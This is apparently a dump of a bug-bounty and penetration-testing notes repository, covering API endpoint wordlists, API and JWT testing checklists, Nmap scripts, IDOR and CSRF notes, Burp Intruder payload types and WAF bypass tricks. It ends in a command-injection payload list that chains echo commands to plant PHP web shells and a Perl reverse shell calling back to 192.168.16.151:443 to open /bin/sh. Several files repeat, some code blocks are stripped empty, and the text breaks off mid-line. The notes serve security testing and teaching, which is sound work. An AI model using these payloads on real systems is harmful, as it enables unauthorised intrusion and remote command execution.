[https://github.com/chrislockard/api\_wordlist](https://github.com/chrislockard/api_wordlist) 6 | 7 | actuator 8 | 9 | health 10 | 11 | trace 12 | 13 | logfile 14 | 15 | metrics 16 | 17 | heapdump 18 | 19 | status 20 | 21 | ping 22 | 23 | api-docs 24 | 25 | application.wadl 26 | 27 | doc 28 | 29 | docs 30 | 31 | swagger-ui.html 32 | 33 | swagger.json 34 | 35 | jolokia 36 | 37 | apis 38 | 39 | api/v1/ 40 | 41 | healthz 42 | 43 | metrics 44 | 45 | swagger.json 46 | 47 | api/proxy 48 | 49 | download 50 | 51 | readfile 52 | 53 | read\_file 54 | 55 | fetch 56 | 57 | admin 58 | 59 | api/proxy?url= 60 | 61 | api/payment?id= 62 | 63 | heapdump 64 | 65 | admin/heapdump 66 | 67 | manage/heapdump 68 | 69 | actuator/heapdump 70 | 71 | solr 72 | 73 | Search-Replace-DB/ 74 | 75 | Search-Replace-DB-master/ 76 | 77 | adminer.sql 78 | 79 | composer.json 80 | 81 | manifest.json 82 | 83 | temp/ 84 | 85 | data/ 86 | 87 | test 88 | 89 | debug 90 | 91 | backup 92 | 93 | old 94 | 95 | \_admin 96 | 97 | backup 98 | 99 | application.wadl 100 | 101 | metrics 102 | 103 | graph 104 | 105 | .svn 106 | 107 | mw-config 108 | 109 | dev 110 | 111 | maintenance 112 | 113 | status2 114 | 115 | \_legacy 116 | 117 | 2 118 | 119 | graph 120 | 121 | graphiql 122 | 123 | graphql 124 | 125 | graphql-explorer 126 | 127 | graphql/cponsole 128 | 129 | heapdump 130 | 131 | jenkins/script 132 | 133 | manage/hea\[du,\[ 134 | 135 | secure/attachmentzip 136 | 137 | secure/configurereport.jspa 138 | 139 | testing 140 | 141 | version 142 | 143 | out 144 | 145 | sr 146 | 147 | sj 148 | 149 | charts 150 | 151 | secure/configurereport!default.jspa 152 | 153 | api/batch 154 | 155 | proxy/ 156 | 157 | metrics 158 | 159 | Target/proxy/attacker\_IP/attacker\_port/ 160 | 161 | ui/\#/app 162 | 163 | java 164 | 165 | dashboard 166 | 167 | pprof 168 | 169 | proxy 170 | 171 | nomad 172 | 173 | nomad/global/ 174 | 175 | nomad/global/cluster 176 | 177 | .php.swp 178 | 179 | test/ 180 | 181 | demo 182 | 183 | .git 184 | 185 | secret 186 | 187 | actuator 188 | 189 | beans 190 | 191 | service?wsdl 192 | 193 | passwords 194 | 195 | system/console 196 | 197 | config 198 | 199 | upload 200 | 201 | files 202 | 203 | proxy 204 | 205 | server-status 206 | 207 | web-INF/web.xml 208 | 209 | -------------------------------------------------------------------------------- /api-attacks/api-attacks.md: -------------------------------------------------------------------------------- 1 | # API attacks 2 | 3 | 4 | 5 | * access controls - authorization/authentication 6 | * basically, proving who you say you are / granting access to resources 7 | 8 | the server process for auth. checks goes like.. 9 | 10 | * if account/session exists 11 | * if request/resource is in access scope of client 12 | * if any cookies/tokens needed 13 | * if the way to route to the resource was valid 14 | * if any other conditions the server expects are met 15 | 16 | measuring success : if server returns a token/session id, further requests will be granted 17 | 18 | how to test for access controls? 19 | 20 | * enumerate potential restricted endpoints 21 | * modify session tokens 22 | * attempt to bypass restrictions with IDOR 23 | * modify request with parameters like "&admin=true" or "test=1" 24 | * modify referrer headers to things the app will expect \(say you came from some other part of the app\) 25 | 26 | **INPUT VALIDATION** 27 | 28 | * input is ANYTHING a server takes in : from user, third party apps, elsewhere 29 | 30 | **parameters to test::** 31 | 32 | * within request header 33 | * parameters within the URL 34 | * parameters in the request 35 | * file uploads \(PUT/DELETE requests\) 36 | * input validation bugs :: -improper parameterization of requests in logic 37 | * lack of input sanitation/escaping 38 | * improper handling of parameters 39 | * file upload bugs, unicode bugs \(what can you pass into server for data and how is it handled\) 40 | 41 | **input validation fuzzing** 42 | 43 | * RCE, XSS, LFI/RFI, SQL injection, request splitting, deserialization, XXE, encoding errors with junk characters/emojis, file upload vulnerabilities, SSRF 44 | * you can use burp, gobuster, dirb, etc 45 | 46 | 47 | **Rate limiting - ways to test** 48 | 49 | * make requests in varying states of authentication 50 | * as a unauthenticated user 51 | * a legit ones 52 | * as a developer 53 | * as a bot 54 | * with a deactivated account 55 | * with bogus credentials 56 | 57 | you can make a gross amount of requests and enumerate or find DDOS ways 58 | 59 | **Restricting HTTP methods** 60 | 61 | * what the app supports and what it expects is important before fuzzing 62 | * sometimes scope of methods is too broad leading a user to be able to PUT DELETE POST etc parts of the API 63 | * even if they aren't included, an app can be lazy and have nothing to parse and will do weird shit 64 | 65 | **3rd party API abuse - sometimes APIs rely on other APIs** 66 | 67 | * there is usually trust between the two 68 | * request splitting - making additional requests to a third party API thru target API 69 | * SSRF - APIs that resolve URLs can be tricked into making requests to the server itself \(to gain data, enumeration, cloud access\) 70 | * mishandled input from 3rd party 71 | 72 | Information Disclosure 73 | 74 | How to find it: 75 | 76 | * use wappalyzer and look for ruby and angular or ruby/react combo 77 | * These usually follow pattern of /model/id or model/subresource/id 78 | 79 | In proxy history :: 80 | 81 | * Look for giant JSON encoded blobs in page sources 82 | * Watch for API calls 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /api-penetration-testing/api-attacks.md: -------------------------------------------------------------------------------- 1 | # API attacks 2 | 3 | 4 | 5 | * access controls - authorization/authentication 6 | * basically, proving who you say you are / granting access to resources 7 | 8 | the server process for auth. checks goes like.. 9 | 10 | * if account/session exists 11 | * if request/resource is in access scope of client 12 | * if any cookies/tokens needed 13 | * if the way to route to the resource was valid 14 | * if any other conditions the server expects are met 15 | 16 | measuring success : if server returns a token/session id, further requests will be granted 17 | 18 | how to test for access controls? 19 | 20 | * enumerate potential restricted endpoints 21 | * modify session tokens 22 | * attempt to bypass restrictions with IDOR 23 | * modify request with parameters like "&admin=true" or "test=1" 24 | * modify referrer headers to things the app will expect \(say you came from some other part of the app\) 25 | 26 | **INPUT VALIDATION** 27 | 28 | * input is ANYTHING a server takes in : from user, third party apps, elsewhere 29 | 30 | **parameters to test::** 31 | 32 | * within request header 33 | * parameters within the URL 34 | * parameters in the request 35 | * file uploads \(PUT/DELETE requests\) 36 | * input validation bugs :: -improper parameterization of requests in logic 37 | * lack of input sanitation/escaping 38 | * improper handling of parameters 39 | * file upload bugs, unicode bugs \(what can you pass into server for data and how is it handled\) 40 | 41 | **input validation fuzzing** 42 | 43 | * RCE, XSS, LFI/RFI, SQL injection, request splitting, deserialization, XXE, encoding errors with junk characters/emojis, file upload vulnerabilities, SSRF 44 | * you can use burp, gobuster, dirb, etc 45 | 46 | 47 | **Rate limiting - ways to test** 48 | 49 | * make requests in varying states of authentication 50 | * as a unauthenticated user 51 | * a legit ones 52 | * as a developer 53 | * as a bot 54 | * with a deactivated account 55 | * with bogus credentials 56 | 57 | you can make a gross amount of requests and enumerate or find DDOS ways 58 | 59 | **Restricting HTTP methods** 60 | 61 | * what the app supports and what it expects is important before fuzzing 62 | * sometimes scope of methods is too broad leading a user to be able to PUT DELETE POST etc parts of the API 63 | * even if they aren't included, an app can be lazy and have nothing to parse and will do weird shit 64 | 65 | **3rd party API abuse - sometimes APIs rely on other APIs** 66 | 67 | * there is usually trust between the two 68 | * request splitting - making additional requests to a third party API thru target API 69 | * SSRF - APIs that resolve URLs can be tricked into making requests to the server itself \(to gain data, enumeration, cloud access\) 70 | * mishandled input from 3rd party 71 | 72 | Information Disclosure 73 | 74 | How to find it: 75 | 76 | * use wappalyzer and look for ruby and angular or ruby/react combo 77 | * These usually follow pattern of /model/id or model/subresource/id 78 | 79 | In proxy history :: 80 | 81 | * Look for giant JSON encoded blobs in page sources 82 | * Watch for API calls 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /api-attacks/checklist.md: -------------------------------------------------------------------------------- 1 | # Checklist 2 | 3 | 1\) Observe each parameter in every module of API, understand how the data is transferred from source to destination. Try to play with the parameter by tampering them. 4 | 5 | 2\) Identify if the API has any authorization token if it is having then remove that authorization token and see application response. In some cases, if authorization is not implemented correctly then API might give you access to forbidden assets of application. 6 | 7 | 3\) Analyze and check each module with a different access level of user ex: admin, moderator, normal user. 8 | 9 | 4\) Check whether admin modules can be accessed via the restricted user. 10 | 11 | 5\) Identify the parameters which may vulnerable to IDOR type vulnerabilities such as id=1234 and also look at the cookies for manipulating the Ids. 12 | 13 | 6\) Check injection vulnerabilities by inserting special characters in all parameters in a request and check the response from the server. If you find any stack traces then use the information for further exploitation. 14 | 15 | 7\) Insert greater than, less than \(<,>\) characters in all parameters and see response whether the application encoding them as > and <. If an application doesn’t escape any special characters then the application may be vulnerable to client-side attacks such as XSS \(cross-site scripting\). 16 | 17 | 8\) Modify the content-type server header for understanding the XML entity injection attack. Example: change content Application/JSON to application/XML and insert the XML entity payload to find the XML entity injection. 18 | 19 | **most popular tools for testing REST and APIs** 20 | 21 | -postman 22 | 23 | -soapui 24 | 25 | -restAssured 26 | 27 | -httpclient api automation 28 | 29 | **AUTHENTICATION** 30 | 31 | * Check for basic auth 32 | * Test max retry and jail features in login 33 | * Sensitive data not encrypted? 34 | 35 | **JWT** 36 | 37 | * Test brute-forcing w/ jwt\_tool 38 | * Test if algorhythm can be changed \(jwt.io\) 39 | * Test token expiration \(TTL, RTTL\) 40 | * Jwt.io to test if sensitive data in token 41 | * Injection possible in 'kid' element 42 | * Check for time constant verification for HMAC 43 | * Check that keys and secrerts are different between ENV 44 | 45 | **Oauth** 46 | 47 | * Test redirect\_uri for open redirect 48 | * Test existence of response tpye token 49 | * Test CSR 50 | 51 | **Access** 52 | 53 | \*test brute force 54 | 55 | Ind http requests 56 | 57 | Test lack o HSTS header 58 | 59 | **INPUT** 60 | 61 | * Test http methods \(get, put, delete, patch, post\) 62 | * Test different content types 63 | * Test for common vulns \(XXS< SQLI, RCE, XXE, etc\) 64 | * Test or url sensitive data \(password, tkens, api keys\) 65 | 66 | **Processing** 67 | 68 | * check if all endpoints are protected behind auth 69 | * Check if resource iD is used in the urlk 70 | * Test for debug use 71 | 72 | **Output** 73 | 74 | * Check for X-content-type options nosniff 75 | * X-frame options : deny 76 | * Content security policy default src none 77 | * Check for fingerprinting headers \(x-owered by, server, x-aspnet version\) 78 | * Check for content type forcing 79 | * Check for return sensitive data 80 | 81 | -------------------------------------------------------------------------------- /tools/nmap.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Fyodor's masterpiece, available everywhere it's wanted and most places that it 4 | isn't. 5 | --- 6 | 7 | # Nmap 8 | 9 | Nmap really one of the goats. Absolutely still use this for almost every CTF, Bug Bounty, Pentest, etc.. and pretty much right away. If you're not using the NSE scripts deeply and often, you aren't using it beyond 15% of its awesome potential, so take the deep dive and take it right now. 10 | 11 | Here's a handful of web app scripts: 12 | 13 | ![](../.gitbook/assets/image%20%2814%29.png) 14 | 15 | ![Don't forget to have fun ](../.gitbook/assets/image%20%2817%29.png) 16 | 17 | ![](../.gitbook/assets/image%20%2815%29.png) 18 | 19 | Kinda went overboard with this list but here are my favorite NSE scripts for bug bounty \(and I guess anything really\). 20 | 21 | allseeingeye-info.nse 22 | asn-query.nse 23 | auth-owners.nse 24 | banner-nse 25 | broadcast-dropbox-discover.nse 26 | braodcast-jenkins-discover.nse 27 | citrix-enum-apps.nse 28 | citrix-enum-servers.nse 29 | citrix-user-enum 30 | citrix-user-brute 31 | couchdb-databases 32 | dns-cache-snoop.nse 33 | dns-brute.nse 34 | dns-blacklist.nse 35 | dns-service-discovery 36 | dns-srv-enum 37 | finger 38 | firewalk 39 | firewall-bypass 40 | ftp-anon 41 | ftp-bounce 42 | ftp-brute 43 | gopher-ls 44 | http-apache-negotiation 45 | http-aspnet-debug.nse 46 | http-auth 47 | http-auth-finder 48 | http-backup-finder 49 | http-bigip-cookie 50 | http-brute 51 | http-cisco-anyconnect 52 | http-csrf 53 | http-cors 54 | http-dlink-backdoor 55 | http-dombased-xss 56 | http-drupal-enum 57 | http-drupal-enum-users 58 | http-exif-spider 59 | http-favicon 60 | http-form-brute 61 | http-form-fuzzer 62 | http-grep 63 | http-joomla-brute 64 | http-methods 65 | http-method-tamper 66 | http-open-redirect 67 | http-passwd 68 | http-rfi-spider 69 | http-shellshock 70 | https-redirect 71 | http-sql-injection 72 | http-trace 73 | http-traceroute 74 | http-stored-xss 75 | http-waf-fingerprint 76 | http-xssed 77 | mongodb-brute 78 | mongodb-databases 79 | mongodb-info 80 | ms-sql-brute\(info, query, dump-hashes, config, tableds\) 81 | mysql-audit \(brute, databases, enum, info, query, users, variables\) 82 | nessus-brute 83 | oracle-brute 84 | oracle-enum-users 85 | oracle-sid-brute 86 | oracle-brute-stealth 87 | pgsql-brute 88 | pop3-brute 89 | redis-info 90 | redis-brute 91 | smb-enum-groups\(domains, services,sessions, shares, users\) 92 | smb-flood 93 | smb-os-discovery 94 | smtp-brute \(commands, enum-users, strangeport\) 95 | sniffer-detect 96 | snmp-brute \(info, interfaces, netstat, processss\) 97 | socks-brute 98 | ssh-brute 99 | ssh-auth-methods 100 | ssh-run 101 | ssh-publickey-acceptance 102 | ssl-cert 103 | sstp-discover 104 | svn-brute 105 | targets-asn 106 | targets-sniffer 107 | telnet-brute 108 | tftp-enum 109 | vulners 110 | whois-up 111 | xmpp-brute 112 | whois-domains 113 | 114 | -------------------------------------------------------------------------------- /api-penetration-testing/checklist.md: -------------------------------------------------------------------------------- 1 | # Checklist 2 | 3 | 1\) Observe each parameter in every module of API, understand how the data is transferred from source to destination. Try to play with the parameter by tampering them. 4 | 5 | 2\) Identify if the API has any authorization token if it is having then remove that authorization token and see application response. In some cases, if authorization is not implemented correctly then API might give you access to forbidden assets of application. 6 | 7 | 3\) Analyze and check each module with a different access level of user ex: admin, moderator, normal user. 8 | 9 | 4\) Check whether admin modules can be accessed via the restricted user. 10 | 11 | 5\) Identify the parameters which may vulnerable to IDOR type vulnerabilities such as id=1234 and also look at the cookies for manipulating the Ids. 12 | 13 | 6\) Check injection vulnerabilities by inserting special characters in all parameters in a request and check the response from the server. If you find any stack traces then use the information for further exploitation. 14 | 15 | 7\) Insert greater than, less than \(<,>\) characters in all parameters and see response whether the application encoding them as > and <. If an application doesn’t escape any special characters then the application may be vulnerable to client-side attacks such as XSS \(cross-site scripting\). 16 | 17 | 8\) Modify the content-type server header for understanding the XML entity injection attack. Example: change content Application/JSON to application/XML and insert the XML entity payload to find the XML entity injection. 18 | 19 | **most popular tools for testing REST and APIs** 20 | 21 | -postman 22 | 23 | -soapui 24 | 25 | -restAssured 26 | 27 | -httpclient api automation 28 | 29 | -Burp Suite/ZAP, of course. 30 | 31 | **AUTHENTICATION** 32 | 33 | * Check for basic auth and fuzz "admin:admin", "test:test", "guest:" or default creds after fingerprinting your target. You can set up intruder to take a list of usernames, a list of passwords, insert a `:` in between, encode them with base64 and plug them into the `Authorization: Basic $FUZZ$` header 34 | * Test rate limiting and lockout features in login 35 | * Sensitive data not encrypted or using unsufficient crypto (i.e. MD5 or base64 + MD5, check out code chef or the Decode tool) 36 | 37 | ### **JWT** 38 | 39 | * Test brute-forcing w/ jwt\_tool 40 | * Test if algorhythm can be changed \(jwt.io or Burp\) 41 | * Test token expiration \(TTL, RTTL\) 42 | * Jwt.io to easily decrypt and test if sensitive data in token 43 | * Injection possible in 'kid' element 44 | * Check for time constant verification for HMAC 45 | * Check that keys and secrerts are different between ENV 46 | 47 | ### **Oauth** 48 | 49 | * Test redirect\_uri for open redirect 50 | * Test existence of response type token 51 | * Test CSR 52 | * Honestly, I need to brush up on here, there's lots of research out there to learn 53 | 54 | Test lack of HSTS header 55 | 56 | ### **INPUT** 57 | 58 | * Test http methods \(GET, POST, PUT, PHATFARM, DELETE\) 59 | * Test different content types 60 | * Test for common vulns \(XXS< SQLI, RCE, XXE, etc\) 61 | * Test for sensitive data in URLs, JS files, etc... \(password, tokens, api keys\) 62 | 63 | ### **Processing** 64 | 65 | * check if all endpoints are protected behind auth 66 | * Check if resource iD is used in the urlk 67 | * Test for debug use 68 | 69 | ### **Output** 70 | 71 | * `X-Frame-Options: Deny` 72 | * Content security policy default src none 73 | * Check for fingerprinting headers \(X-Powered-By, Server, X-ASPnet-Version\) 74 | * Check for content-type forcing 75 | * Check for sensitive data in response 76 | 77 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/untitled.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Find any and all UIDs ● increment ● decrement ● negative values ● Attempt to 4 | perform sensitive functions substituting another UID ○ change password ○ 5 | forgot password ○ admin only functionswh 6 | --- 7 | 8 | # IDORs / Auth. Bugs 9 | 10 | **User IDs** can they be predicted? altered? created? found somewhere else in the app \(URL of user's profile, some other section of the site\) 11 | 12 | `GET /api_v1/messages?conversation_id=`**SOME\_RANDOM\_ID** `` 13 | 14 | Find any and all UIDs and manipulate them. 15 | 16 | * increment them 17 | * decrement them 18 | * substitute with negative values 19 | * try various naughty strings such as... 20 | * non UTF-8 characters, "null/undefined", 0.00, $0.0, 0.0.0, 1.0/0.0, -,, 21 | !@\#$%^&\*\(\)\`~, 22 | 23 | ­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩ 24 | 𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󐀁󐀠󐀡󐀢󐀣󐀤󐀥󐀦󐀧󐀨󐀩󐀪󐀫󐀬󐀭󐀮󐀯󐀰󐀱󐀲󐀳󐀴󐀵󐀶󐀷󐀸󐀹󐀺󐀻󐀼󐀽󐀾󐀿󐁀󐁁󐁂󐁃󐁄󐁅󐁆󐁇󐁈󐁉󐁊󐁋󐁌󐁍󐁎󐁏󐁐󐁑󐁒󐁓󐁔󐁕󐁖󐁗󐁘󐁙󐁚󐁛󐁜󐁝󐁞󐁟󐁠󐁡󐁢󐁣󐁤󐁥󐁦󐁧󐁨󐁩󐁪󐁫󐁬󐁭󐁮󐁯󐁰󐁱󐁲󐁳󐁴󐁵󐁶󐁷󐁸󐁹󐁺󐁻󐁼󐁽󐁾󐁿 25 | , ., ¸˛Ç◊ı˜Â¯˘¿ 26 | , 部落格 27 | ❤️ 💔 💌 💕 💞 28 | , ﷽ 29 | 30 | * src=JaVaSCript:prompt\(132\), eval\("puts 'hello world'"\), File:///, 🏳0🌈️, {0}, $USER 31 | 32 | Try to substitute other used IDs, hashes, e-mails or anything else belonging to a user that is non-public, if you can't guess them, create another account and pull from there. 33 | 34 | For greater business impact, it is better to target more important functions rather than less significant ones such as "change e-mail subscription settings". A few sensitive functions to prioritize your vulnerability hunting on are: 35 | 36 | * forgot password 37 | * change password 38 | * admin only functions 39 | * account recovery functions 40 | * functions handling direct messaging 41 | * private content and user information 42 | 43 | Some sensitive items you can try to access while unauthorized. 44 | 45 | * Receipts 46 | * Private files \(PDFs, images\) 47 | * Shipping info and purchase orders 48 | 49 | Even if the app doesn't ask for it, try appending `id` ,`user_id` ,`message_id` or other parameters to the request. 50 | 51 | **Privilege Bugs** 52 | 53 | Find functions where different types of users are granted different abilities \(admin vs. manager vs. regular user\) and try to use abilities granted only to power users. Try to browse to areas that are restricted from a regular user by directly inputting the URL from the power user account. Autorize, Authz and Auto-repeater can all help in Burp Suite. 54 | 55 | **Common Privilege Bug Functions** 56 | 57 | * Add user function 58 | * Delete user function 59 | * start project / campaign / etc function 60 | * change account info \(pass, CC, etc\) function 61 | * customer analytics view 62 | * payment processing view 63 | * any page where you can view PII 64 | 65 | **Transporting Data** 66 | 67 | Most security concerned sites will enable HTTPs, though not perfectly across every page. Often times they miss something but only report pages that contain any sensitive information. 68 | 69 | Examples: 70 | 71 | * Sensitive images transported over HTTP 72 | * Analytics with session data / PII leaked over HTTP 73 | 74 | **Business logic flaws** 75 | 76 | The following vulnerabilities cannot typically be found with scanners and require manual testing to find. 77 | 78 | * substituting hashed parameters 79 | * step manipulation 80 | * use negatives in quantities 81 | * authentication bypass 82 | * application level DoS 83 | * Timing attacks 84 | 85 | **Insecure Data Storage Methods** 86 | 87 | Its common to see mobile apps not applying encryption to the files that store PII. 88 | 89 | Common places to find PII unencrypted 90 | 91 | * Phone system logs \(available to all apps\) 92 | * webkit cache \(cache.db\) 93 | * plists, dbs, etc. 94 | * hardcoding data in the binary 95 | 96 | 97 | 98 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/csrf.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Cross Site Request Forgery 3 | --- 4 | 5 | # CSRF 6 | 7 | An attack where a victim unknowingly causes their browser to perform an unwanted action on a site where they are already authenticated. This can be caused via the attacker using some form of social engineering to fool a user into opening a malicious link, e-mail, instant message or program which automates the action. 8 | 9 | 10 | An unrealistic and simplified example would be a victim clicking on a link like https://paypal.com/user/sadvictim/sendfunds/99999dollars/touser/bad\_daddy or https://facebook.com/user/ignoramus/changepassword?newpassword=123456 , though the links would be portrayed as something else and the victim already has logged-in cookies to those domains. 11 | 12 | The vulnerability is available if you can use the same CSRF token across multiple accounts \(check your cookies to find it\). You can build a poc by... 13 | 14 | 15 | * Login to account 1 16 | * Go to password change page 17 | * Capture CSRF token 18 | * Logout and login to account 2 19 | * Go to password change page 20 | * Intercept request with a proxy and replace token 21 | 22 | Or perhaps you can figure out the CSRF token if the implementation sucks. 23 | 24 | 25 | * Keep length of token consistent and try replacing characters \(Burp has great intruder functionality for this, or just CSRF test for the lazy\) 26 | * Try removing the token from the request 27 | * Try to decode the CSRF token \(typically MD5 or base64\) 28 | * HTML Injection with something like <form action="url.com/acquire\_token.php"></textarea> 29 | * Check to see if part of a token is static and cut off the the dynamic part, I've seen bug bounty write-ups where the web app only checked the first part of the token. 30 | 31 | **Common Critical Functions for CSRF** 32 | 33 | * Add/Upload files 34 | * Password change 35 | * E-mail change 36 | * Transfer money 37 | * Delete file 38 | * Profile edits 39 | 40 | **Via GET request** 41 | requiring user interaction: 42 | `Click Me!` 43 | Not requiring user interaction \(will happen as soon as browser loads\) 44 | `` 45 | 46 | **Via POST request** 47 | 48 | 49 | User Interaction Required 50 | 51 | ```text 52 |
53 | 54 | 55 |
56 | ``` 57 | 58 | User Interaction Not Required 59 | 60 | ```text 61 |
62 | 63 | 64 |
65 | 66 | 69 | ``` 70 | 71 | **Via json GET** 72 | 73 | ```text 74 | 79 | ``` 80 | 81 | **Via json POST** 82 | 83 | 84 | ```text 85 | 94 | _______________________OR______________________________ 95 | ``` 102 | ``` 103 | 104 | -------------------------------------------------------------------------------- /burp-suite/intruder-payload-processing.md: -------------------------------------------------------------------------------- 1 | # Intruder Payload Processing 2 | 3 | Add prefix 4 | 5 | Add suffix 6 | 7 | Match / replace - replaces any part of payload \(based on regex\) with a string 8 | 9 | Substring - extracts portion of payload, starting from a specified offset \(0-indexed\) 10 | 11 | Reverse Substring - same as above, but counting backwards from end of the payload 12 | 13 | Modify case - uppercase/lowercase 14 | 15 | Encode - url, html, base64, ascii hex 16 | 17 | Decode - url, html, base64, ascii hex 18 | 19 | Hash - hashing operation on the payload 20 | 21 | Add raw payload - to beginning or end of payload, useful if you need to submit hashed and non-hashed 22 | 23 | Skip if matches regex - if matches a specific regex, skip to next one 24 | 25 | Invoke burp extension - pre-configured jawns by extensions 26 | 27 | * here are 18 types of payloads in intruder i.e. 28 | 29 | * Simple list 30 | * Runtime File 31 | * Case Modification 32 | * Numbers 33 | * Character substitution 34 | * Custom iterator 35 | * Recursive grep 36 | * Illegal Unicode 37 | * Character blocks 38 | * Dates 39 | * Brute Forcer 40 | * Null Payloads 41 | * Character frober 42 | * Bit Flipper 43 | * Username generator 44 | * ECB block shuffler 45 | * Extension Generated 46 | * Copy other payload 47 | 48 | Runtime file - configure a file which reads the payload strings at runtime. Good for a large list of payloads, so it doesn’t have to hold the whole fucking thing in memory and crash 49 | 50 | Case modification - make it uppercase, lowercase, no change, Proper Name, Proper name 51 | 52 | Numbers - 53 | 54 | Type : sequential or random generation 55 | 56 | From : first 57 | 58 | To : last \(highest number possible\) 59 | 60 | Step : if sequentially, whats the increment 61 | 62 | How many : total number of payloads generated \(random only\) 63 | 64 | Character substitution : what gets swapped for what 65 | 66 | JANN \( let's set a > 5 , n > y\) will create all of the following 67 | 68 | J5NN 69 | 70 | J5YN 71 | 72 | J5YY 73 | 74 | J5NY 75 | 76 | JAYN 77 | 78 | JANY 79 | 80 | JAYY 81 | 82 | Custom iterator : 83 | 84 | Recursive grep - based on what you're grepping for, will produce future payloads. Like a server's error message may reveal a path to discover content. 85 | 86 | -what to grep for \(and make payloads from\) 87 | 88 | -first payload 89 | 90 | -stop if duplicate payload found 91 | 92 | * Illegal Unicode -variations to bypass WAFs via continuation bytes, overlong encodings, similar looking characters 93 | * Character blocks -set to fuzz buffer overflow or logic flaws \(bypass mandatory length min/max in forms, end up at a strange path\) 94 | * Dates set for birth date, wedding, anniversary, etc to brute force passwords 95 | * Parameters are From \(first date\) To \(last date\), step \(increment for sequential - days, weeks, months, years\) and format \(Mon v Monday, 2 v 02, 9 v 09 v 2009\) 96 | 97 | Brute Forcer 98 | 99 | Character set : set of characters to use 100 | 101 | Min length 102 | 103 | Max length 104 | 105 | * Null Payloads - same ass payload over and over… for Denial of service, keeping session token alive or producing new cookies from same request 106 | * Character frobber - a slow cycle thru the base string,one character at a time. Used to test session token, to see if tiny changes have an effect or if it can be figured out 107 | * Bit Flipper - operate on : base value of payload position or another string. Flip bits from least to most important \(ascii hex\) 108 | * Username generator - sets up a list of names or emails from a source, so "Snake Pliskin" would produce snakepliskin snake.pliskin, pliskinsnake, plsikin.snake, pliskin, snake, pliskins 109 | * For when you target a user but don’t know their username 110 | * ECB block shuffler shitty passwords set up in blocks of 8 or 16 usually, so you can make a user like aaaaaaadmin and fuck with it to get thru authorization 111 | * Extension Generated - like from hackvertors encodings/decodings or XSS validator's phantomjs jawn 112 | * Copy other payload - copies other payload in same attack setup, like if you're using cluster bomb, pitchfork or battering ram 113 | * Useful when… need same payload types, sets, dictionaries, just different positions 114 | 115 | -------------------------------------------------------------------------------- /waf-bypasses/general-waf-torment.md: -------------------------------------------------------------------------------- 1 | # General WAF torment 2 | 3 | Generally, a WAF bypass will be one of these three types. 4 | 5 | 1. **Pre-Processor:** the WAF skips the input validation completely 6 | 2. **Impedence Mismatch**: the WAF interprets the input differently than the server 7 | 3. **Rule set bypass**: the payload is too sneaky or futuristic for the WAF 8 | 9 | A WAF may have certain rules to change a certain input, prevent it from being passed to the server or blocking the IP completely. To be succesful, you must be patient and understand what you are doing, as throwing fat polyglot payloads will not work most of the time, while something painfully simple may do the trick. 10 | Take your time and fuzz the input intelligently, so you can figure out a bypass if you suspect a susceptible endpoint. 11 | 12 | **Bypass methods:** 13 | 14 | Adding new headers unfamiliar to the WAF, with their own payloads as a value. 15 | • X-Originating-IP 16 | • X-Forwarded-For 17 | • X-Remote-IP 18 | • X-Remote-Addr 19 | 20 | Maybe the WAF only looks for GET and POST requests, whereas THICCBABY as an http method may glide through. 21 | 22 | **HTTP Parameter Pollution** 23 | 24 | Depending on the back-end system, this is often dealt with in very different ways. For example, adding another of the same parameter with a different value, as below... 25 | 26 | ```text 27 | /?productid=1&productid=2 28 | ``` 29 | 30 | **ASP.NET** parses it into "`productid=1,2"` 31 | **JSP** parses it into "`productid=1"` 32 | **PHP** parses it into `"productid=2"` 33 | 34 | **Combining SQL Injection and Parameter Pollution** 35 | 36 | A legitimate SQL query like below... 37 | 38 | 39 | ```text 40 | ?productid=select 1,2,3 from table 41 | ``` 42 | 43 | can be turned into a parameter pollution attack and divided in a number of different ways 44 | 45 | ```text 46 | ?productid=select 1&productid=2,3 from table 47 | ``` 48 | 49 | Will this be combined? Just take the first parameter's value? Just the second and third 50 | 51 | Other than that, you can try all the various encodings, though URL and double URL will be the most succesful. 52 | 53 | _Double URL encoding example:_ 54 | 55 | `1 union select 1,2,3 56 | ’s’ -> %73 -> %25%37%33 57 | 1 union %25%37%33elect 1,2,3` 58 | 59 | 's' via URL encoding becomes `%73`, which can be encoded again to create `%25%37%33` 60 | 61 | If you really want to bypass WAFs in the current year. 62 | `' 191 | echo ''// XXXXXXXXXXX 192 | | echo "" > rfi.php 193 | ; echo "" > rfi.php 194 | & echo "" > rfi.php 195 | && echo "" > rfi.php 196 | echo "" > rfi.php 197 | | echo "" > dir.php 198 | ; echo "" > dir.php 199 | & echo "" > dir.php 200 | && echo "" > dir.php 201 | echo "" > dir.php 202 | | echo "" > cmd.php 203 | ; echo "" > cmd.php 204 | & echo "" > cmd.php 205 | && echo "" > cmd.php 206 | echo "" > cmd.php 207 | ;echo '' 208 | echo ''// XXXXXXXXXXX 209 | echo ''// XXXXXXXXXXX 210 | | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 211 | ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 212 | & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 213 | && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 214 | echo "use 